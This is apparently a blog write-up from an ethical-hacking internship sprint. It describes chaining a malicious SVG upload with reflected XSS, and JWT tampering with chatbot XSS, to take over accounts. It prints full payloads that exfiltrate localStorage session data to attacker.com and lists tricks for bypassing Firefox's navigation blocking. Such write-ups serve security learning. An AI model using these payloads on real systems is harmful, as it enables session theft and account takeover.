DEV Community

ali eltaib

Cyblack internship Ethical hacking sprint write-up

One of the most exciting parts of my Ethical Hacking sprint with CyBlack was moving beyond single findings and thinking in terms of attack chains and real-world impact.
A vulnerability on its own may seem low or medium risk, but during this sprint I focused on how multiple weaknesses can be combined into high-impact exploitation paths.

This is a walk-through of two of my favorite findings:

1- First Multi-Stage Chain Exploit

The Issue

We couldn’t directly access session-related values because the SVG payload executes on the API endpoint, which runs on a different port than the main web application. An origin is the tuple of scheme, host and port, so the API is a separate origin, and localStorage is scoped per origin: script running there cannot read the main application’s storage.

To overcome this, the idea was to pivot the execution context:

Redirect the user from the API endpoint → to the /reset-password endpoint
This endpoint reflects the code parameter into the page unencoded (treated as self-XSS during the sprint, but since the parameter arrives in the URL it fires for anyone who follows the link)
This allows execution within the main application origin, enabling access to session data

A reasonable question is: why not just use the reset password XSS directly?

The answer is stealth and user perception:

The /reset-password URL may raise suspicion
The SVG URL appears benign (e.g., a shared image)
Additionally, serving uploaded files from the /uploads directory without authentication, with an active content type such as image/svg+xml, is itself a bad practice

One caveat worth knowing when weaponising this: browsers never run scripts in an SVG that is loaded through an <img> tag or as a CSS background. The script only executes when the SVG URL is opened as a document (a direct link, or <object>/<iframe>), which is exactly what a "shared image" link gets the victim to do.

Chain of Thought

Initial payload:

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
       var xssPayload = "<img src=x onerror=\"fetch('https://attacker.com/steal?data=' + btoa(localStorage.getItem('user')))\">";

    var target = "http://target.com/reset-password?email=hacker@cyber.com&code=" + encodeURIComponent(xssPayload);

    window.location.href = target;

   </script>
</svg>

This didn’t consistently trigger the request, so I switched to an onload handler on the root svg element, which fires as soon as the element has finished loading:

<svg onload="fetch('https://attacker.com/steal?data=' + btoa(localStorage.getItem('user')))">

Issue Encountered: SVG Parsing Error

Once the onload snippet was embedded as a string inside the outer SVG’s <script>, the document failed to load with:

AttValue: " or ' expected

This happens because SVG is an XML document: the XML parser runs over the whole file before any JavaScript executes, and it does not know that the text inside <script> is code. Special characters (<, >, &, ") are interpreted as markup wherever they appear.

Inside the string literal the parser reaches <svg onload=\"... and treats it as a start tag whose attribute value begins with a backslash instead of a quote, hence the AttValue error.

Solution: CDATA Section

To fix this, I wrapped the JavaScript inside a CDATA block, which tells the XML parser to treat the content as raw character data. The only sequence a CDATA section cannot contain is its own terminator, ]]>.

Final working payload:

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124">
  <rect width="124" height="124" rx="24" fill="#000000"/>
  <script type="text/javascript">
    <![CDATA[
      // Using CDATA prevents the XML parser from breaking on quotes or < > symbols
      var xssPayload = "<svg onload=\"fetch('https://attacker.com/steal?data=' + btoa(localStorage.getItem('user')))\">";

      var target = "http://target.com/reset-password?email=hacker@cyber.com&code=" + encodeURIComponent(xssPayload);

      window.location.href = target;
    ]]>
  </script>
</svg>

Firefox Breakout Issue

Interestingly, the exploit worked in Chrome but not in Firefox.

This highlights browser security differences:

Navigation blocking: Firefox restricts automatic redirects from untrusted contexts (like XML/SVG)
Storage partitioning: Data access depends on how the page is loaded (top-level vs embedded)
Frame restrictions: Prevent unauthorized top-level navigation

Bypass Techniques

To make the exploit work in Firefox:

Use setTimeout() to delay the navigation until the document has finished loading (bypasses immediate navigation blocking)
Use window.top so the navigation targets the top-level browsing context, escaping the SVG context if it is embedded
Use location.replace() instead of assigning location.href to bypass navigation protections

2- Second Multi-Stage Chain: Chatbot Account Takeover

Initial Finding

A reflected XSS vulnerability was identified in the chatbot interface.

JavaScript payloads were successfully executed
However, the impact was limited when used alone

Escalation Strategy

To increase impact, I looked for ways to make the payload execute in another user’s context.

JWT Tampering Discovery

The application retrieves chat history based on a user ID stored in the JWT.

This JWT was not properly validated: the server acted on the user ID claim without rejecting a token whose contents had been altered, allowing:

  • Modification of the user ID
  • Impersonation of other users

Exploit Chain

  • Modify JWT → impersonate another user (e.g., admin/doctor)
  • Send a malicious message via chatbot
  • The message is rendered in the victim’s chat interface without output encoding
  • XSS payload executes in the victim’s browser
  • Session data is exfiltrated

Payload Used

<img src=x onerror="new Image().src='https://attacker.com/?d=' + btoa(localStorage.getItem('user'));">

Impact

This chain significantly increases severity:

  1. Account takeover
  2. Privilege escalation (e.g., accessing sensitive data)
  3. Cross-user attack execution
  4. Persistent XSS (if chat history is stored and re-rendered)
  5. Internal phishing & spoofing attacks

It also bypasses protections like:

  • IP restrictions
  • Geo-fencing

because the attack originates from a legitimate user session: the exfiltration request is made by the victim’s own browser, from the victim’s own IP address and location, not from the attacker’s network.

Extended Abuse Scenarios

Injecting fake login forms within the chat window
Spoofing support messages
Delivering phishing payloads through trusted channels
